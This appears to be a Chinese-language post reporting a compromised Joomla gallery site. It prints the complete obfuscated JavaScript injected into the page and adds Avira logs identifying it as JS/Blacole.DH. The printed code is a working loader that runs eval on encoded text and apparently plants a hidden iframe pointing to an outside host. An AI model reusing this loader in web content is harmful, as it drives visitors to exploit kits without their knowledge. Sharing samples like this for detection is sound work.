裏面

fireold

1. http://deraukendebentjes.nl/jml_drb/index.php?option=com_joomgallery&func=viewcategory&catid=4&

复制代码

1. 
   
2. /*da3e94*/
   
3. bv = (5 - 3 - 1);
   
4. aq = "0" + "x";
   
5. sp = "spli" + "t";
   
6. ff = String.fromCharCode;
   
7. w = window;
   
8. z = "dy";
   
9. try {
   
10.     document["\x62o" + z]++
    
11. } catch (d21vd12v) {
    
12.     vzs = false;
    
13.     v = 123;
    
14.     try {
    
15.         document;
    
16.     } catch (wb) {
    
17.         vzs = 2;
    
18.     }
    
19.     if (!vzs) e = w["eval"];
    
20.     if (1) {
    
21.         f = "17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5a,69,5c,5a,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,5a,69,5c,5a,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,60,61,6e,60,63,63,5c,65,5e,63,58,6a,6d,5c,71,5c,63,25,5c,6c,26,5a,66,6c,65,6b,25,67,5f,67,1e,32,4,1,17,5a,69,5c,5a,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,17,34,17,1e,58,59,6a,66,63,6c,6b,5c,1e,32,4,1,17,5a,69,5c,5a,25,6a,6b,70,63,5c,25,59,66,69,5b,5c,69,17,34,17,1e,27,1e,32,4,1,17,5a,69,5c,5a,25,6a,6b,70,63,5c,25,5f,5c,60,5e,5f,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,5a,69,5c,5a,25,6a,6b,70,63,5c,25,6e,60,5b,6b,5f,17,34,17,1e,28,67,6f,1e,32,4,1,17,5a,69,5c,5a,25,6a,6b,70,63,5c,25,63,5c,5d,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,5a,69,5c,5a,25,6a,6b,70,63,5c,25,6b,66,67,17,34,17,1e,28,67,6f,1e,32,4,1,4,1,17,60,5d,17,1f,18,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,5a,69,5c,5a,1e,20,20,17,72,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,1e,33,5b,60,6d,17,60,5b,34,53,1e,5a,69,5c,5a,53,1e,35,33,26,5b,60,6d,35,1e,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,5a,69,5c,5a,1e,20,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5a,69,5c,5a,20,32,4,1,17,74,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,4a,5c,6b,3a,66,66,62,60,5c,1f,5a,66,66,62,60,5c,45,58,64,5c,23,5a,66,66,62,60,5c,4d,58,63,6c,5c,23,65,3b,58,70,6a,23,67,58,6b,5f,20,17,72,4,1,17,6d,58,69,17,6b,66,5b,58,70,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,6d,58,69,17,5c,6f,67,60,69,5c,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,60,5d,17,1f,65,3b,58,70,6a,34,34,65,6c,63,63,17,73,73,17,65,3b,58,70,6a,34,34,27,20,17,65,3b,58,70,6a,34,28,32,4,1,17,5c,6f,67,60,69,5c,25,6a,5c,6b,4b,60,64,5c,1f,6b,66,5b,58,70,25,5e,5c,6b,4b,60,64,5c,1f,20,17,22,17,2a,2d,27,27,27,27,27,21,29,2b,21,65,3b,58,70,6a,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,17,34,17,5a,66,66,62,60,5c,45,58,64,5c,22,19,34,19,22,5c,6a,5a,58,67,5c,1f,5a,66,66,62,60,5c,4d,58,63,6c,5c,20,4,1,17,22,17,19,32,5c,6f,67,60,69,5c,6a,34,19,17,22,17,5c,6f,67,60,69,5c,25,6b,66,3e,44,4b,4a,6b,69,60,65,5e,1f,20,17,22,17,1f,1f,67,58,6b,5f,20,17,36,17,19,32,17,67,58,6b,5f,34,19,17,22,17,67,58,6b,5f,17,31,17,19,19,20,32,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,3e,5c,6b,3a,66,66,62,60,5c,1f,17,65,58,64,5c,17,20,17,72,4,1,17,6d,58,69,17,6a,6b,58,69,6b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,65,58,64,5c,17,22,17,19,34,19,17,20,32,4,1,17,6d,58,69,17,63,5c,65,17,34,17,6a,6b,58,69,6b,17,22,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,22,17,28,32,4,1,17,60,5d,17,1f,17,1f,17,18,6a,6b,58,69,6b,17,20,17,1d,1d,4,1,17,1f,17,65,58,64,5c,17,18,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,27,23,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,20,17,20,17,20,4,1,17,72,4,1,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,74,4,1,17,60,5d,17,1f,17,6a,6b,58,69,6b,17,34,34,17,24,28,17,20,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,6d,58,69,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,19,32,19,23,17,63,5c,65,17,20,32,4,1,17,60,5d,17,1f,17,5c,65,5b,17,34,34,17,24,28,17,20,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,63,5c,65,5e,6b,5f,32,4,1,17,69,5c,6b,6c,69,65,17,6c,65,5c,6a,5a,58,67,5c,1f,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,63,5c,65,23,17,5c,65,5b,17,20,17,20,32,4,1,74,4,1,60,5d,17,1f,65,58,6d,60,5e,58,6b,66,69,25,5a,66,66,62,60,5c,3c,65,58,59,63,5c,5b,20,4,1,72,4,1,60,5d,1f,3e,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,20,34,34,2c,2c,20,72,74,5c,63,6a,5c,72,4a,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1" [sp](",");
    
22.     }
    
23.     w = f;
    
24.     s = [];
    
25.     for (i = 2 - 2; - i + 1336 != 0; i += 1) {
    
26.         j = i;
    
27.         if ((0x19 == 031)) if (e) s += ff(e(aq + (w[j])) + 0xa - bv);
    
28.     }
    
29.     za = e;
    
30.     za(s)
    
31. } /*/da3e94*/
    

复制代码

Avira

2013/12/25 上午 07:48 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\7853OJ09\overlib_mini[1].js'
      包含病毒或有害的程式 'JS/Blacole.DH.1' [virus]
      已採取動作：
      檔案會移動至 '5c8ebe8e.qua' 名稱底下的隔離區目錄!

2013/12/25 上午 07:48 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描.]。
      檔案數：        781
      目錄數：        0
      惡意程式碼數：        1
      警告數：        0

2013/12/25 上午 07:48 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6TI8XMAJ\index[1].htm'
      包含病毒或有害的程式 'JS/Blacole.DH.2' [virus]
      已採取動作：
      發生錯誤，檔案未刪除。錯誤識別碼：26003.
      檔案無法刪除！.
      嘗試使用 ARK 程式庫執行動作.
      檔案會移動至 '471c99f9.qua' 名稱底下的隔離區目錄!

2013/12/25 上午 07:48 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描.]。
      檔案數：        776
      目錄數：        0
      惡意程式碼數：        1
      警告數：        0

2013/12/25 上午 07:46 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\7853OJ09\overlib_mini[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.DH.1 [virus]'
      執行的動作：傳輸至掃描程式

2013/12/25 上午 07:46 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\7853OJ09\overlib_mini[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.DH.1 [virus]'
      執行的動作：拒絕存取

2013/12/25 上午 07:46 [Web Protection] 發現惡意程式碼
      從 URL "http://deraukendebentjes.nl/jml_drb/includes/js/overlib_mini.js" 存取資料時，
      發現病毒或有害的程式 'JS/Blacole.DH.1' [virus]。
      已採取動作：已略過

2013/12/25 上午 07:46 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6TI8XMAJ\index[1].htm 中
      偵測到病毒或有害的程式 'JS/Blacole.DH.2 [virus]'
      執行的動作：傳輸至掃描程式

2013/12/25 上午 07:46 [Web Protection] 發現惡意程式碼
      從 URL
      "http://deraukendebentjes.nl/jml_drb/index.php?option=com_joomgallery&am
      p;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;func=viewcategory&
      amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;catid=4&
      amp;amp;amp;amp;" 存取資料時，
      發現病毒或有害的程式 'JS/Blacole.DH.2' [virus]。
      已採取動作：已略過

fs is